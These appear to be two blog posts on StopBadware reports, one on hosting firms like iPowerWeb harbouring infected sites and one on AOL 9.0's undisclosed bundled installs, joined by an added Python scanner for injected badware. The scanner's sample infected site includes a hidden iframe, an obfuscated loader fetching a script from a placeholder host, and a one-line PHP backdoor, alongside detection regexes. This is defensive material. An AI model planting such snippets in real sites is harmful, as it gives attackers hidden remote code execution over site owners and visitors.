The Source of the Malware Scourge

Despite appearances, the U.S. is still the most popular place for the bad guys to place their malware code. StopBadware has listed those Internet Service Providers that wittingly or unwittingly host “badware” — an umbrella term for any kind of software that insidiously installs itself on your computer. What’s interesting is that while there is one Chinese company on the list, by far the biggest culprit is one iPowerWeb Inc, based in Phoenix, Arizona, which has more than 10,000 infected sites on its servers. (By comparison, the next biggest culprit has a quarter that number.)

Badware is usually installed on a site without the owner’s knowledge, either by exploiting holes in the software that publishes the site’s content, or by breaking into the site, whether by guessing the owner’s password or by using a hole in the server software. Victims unwittingly download the badware either by visiting the website in question or by being directed there from other websites that have themselves been infected. Here’s a case of a fake MySpace page that lures victims to an iPowerWeb-hosted site where users give up their MySpace password. Interesting detail on how these work is here.

iPowerWeb appears to have a long history of attracting accusations that it doesn’t take this kind of thing seriously. Examples are here, here and here (from two years ago). So far there’s no press statement from iPowerWeb on its website; I’ve requested comment.

The sad thing here is that when Google and organisations like StopBadware find these hacked sites, the sites are flagged and removed from Google searches, or else prefaced by a warning page. While this makes sense, it causes mayhem for the owners of these sites, who are either not technically savvy enough to resolve the problem or find themselves in limbo waiting for their site to be taken off the list after they’ve cleaned it up. A recent discussion of the problem on the StopBadware Google Group is here. (StopBadware says it will respond to appeals within 10 days, and that the typical time is closer to two.)

One can only imagine the scale of the mess caused by all this. Hosting companies need to be smarter about monitoring this problem, or they’ll face declining custom or lawsuits.
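The monitoring hosting companies are being urged to do, and the injection pattern described earlier in the post (hidden iframes and obfuscated loaders slipped into a site’s pages without the owner noticing), can be checked for with a small scan of the site’s files against a known-good baseline. The Python below is an added example written for this page; it is not code from the original post, from StopBadware or from iPowerWeb. The sample site, the example.invalid hostnames and the injection signatures are constructed for illustration, and real campaigns use many more variants than the three patterns shown.

```python
"""Scan a hosted site's files for signs of injected badware: files changed
or added since the owner's known-good baseline, hidden iframes, and
obfuscated loader scripts. Example code for this page, not a real product."""
import hashlib
import re

# Injection signatures (constructed for this example; a starting point, not a
# complete list of what real badware campaigns drop into compromised pages).
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:\b(?:width|height)\s*=\s*[\"']?0\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>",
    re.IGNORECASE,
)
OBFUSCATED_SCRIPT = re.compile(
    r"(?:eval|document\.write)\s*\(\s*(?:unescape|base64_decode)\s*\("  # eval(unescape('%3C...'))
    r"|String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}"                    # long fromCharCode chains
    r"|(?:%[0-9a-f]{2}){20,}",                                         # long runs of %xx-encoded text
    re.IGNORECASE,
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_baseline(files: dict) -> dict:
    """Hash a known-good copy of the site so later changes can be detected."""
    return {path: sha256_hex(content) for path, content in files.items()}


def scan_file(path: str, content: bytes, baseline: dict) -> list:
    """Return the findings for one file (an empty list means it looks clean)."""
    findings = []
    if path not in baseline:
        findings.append("file not in owner's baseline")
    elif baseline[path] != sha256_hex(content):
        findings.append("content changed since baseline")
    text = content.decode("utf-8", errors="replace")
    for match in HIDDEN_IFRAME.finditer(text):
        findings.append("hidden iframe: " + match.group(0)[:60])
    for match in OBFUSCATED_SCRIPT.finditer(text):
        findings.append("obfuscated script: " + match.group(0)[:60])
    return findings


def scan_site(files: dict, baseline: dict) -> dict:
    """Scan every file; return {path: findings} for the files with findings."""
    report = {}
    for path, content in sorted(files.items()):
        findings = scan_file(path, content, baseline)
        if findings:
            report[path] = findings
    return report


# Constructed sample site: the owner's known-good copy ...
CLEAN_SITE = {
    "index.html": b"<html><body><h1>Welcome</h1><script src='js/menu.js'></script></body></html>",
    "contact.html": b"<html><body><p>Email us.</p></body></html>",
    "js/menu.js": b"function showMenu(){document.getElementById('m').style.display='block';}",
}

# ... and the same site after a hypothetical compromise: an injected hidden
# iframe, an appended obfuscated loader, and a dropped PHP backdoor. The
# example.invalid hosts are placeholders, not real addresses.
INFECTED_SITE = {
    "index.html": CLEAN_SITE["index.html"],
    "contact.html": CLEAN_SITE["contact.html"].replace(
        b"</body>",
        b"<iframe src='http://example.invalid/in.cgi' width='0' height='0' "
        b"style='display:none'></iframe></body>",
    ),
    "js/menu.js": CLEAN_SITE["js/menu.js"]
    + b"\neval(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fexample.invalid%2Fx.js%22%3E%3C%2Fscript%3E'));",
    "images/.cache.php": b"<?php eval(base64_decode($_POST['c'])); ?>",
}

if __name__ == "__main__":
    baseline = make_baseline(CLEAN_SITE)
    for path, findings in scan_site(INFECTED_SITE, baseline).items():
        print(path)
        for finding in findings:
            print("  -", finding)
```

Run against the clean copy the scan reports nothing; against the infected copy it flags contact.html and js/menu.js as changed, with the iframe and the eval(unescape(...)) loader named, and images/.cache.php as a file the owner never uploaded. The baseline comparison is what catches the injection even when a new campaign uses a signature the regexes do not know; the signature checks are what tell the owner where to look.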

Sneaky Software: AOL’s Bad

It seems that even the big players still don’t get it. StopBadware, a “neighborhood watch” for sneaky software, says that the latest (9.0) version of AOL software

installs additional software without telling the user, it forces the user to take certain actions, it adds various components to Internet Explorer and the taskbar without disclosure, it may automatically update without the user’s consent, and it fails to uninstall completely.

Pretty damning stuff. We know this kind of thing happens, but this seems somewhat excessive. Most damning are the bundled programs installed without permission, or even without informing the user: RealPlayer (surprise, surprise), QuickTime, AOL You’ve Got Pictures Screensaver, Pure Networks Port Magic, and Viewpoint Media Player. “During the installation process,” StopBadware says, “the user is never clearly notified that AOL will be installing these programs.”

StopBadware quotes AOL as saying that they are reviewing the report.

Companies have got to stop this kind of thing. This report is damning in that it’s clearly not just one oversight: the software has been designed to be as invasive as possible, to basically take over the user’s computer and steer them to all things AOL. That Apple and Real Networks allow themselves to be involved reflects well on neither. And after some difficulty uninstalling it I’m beginning to have my suspicions about Network Magic (Pure Networks Port Magic is an AOL version of the software) too.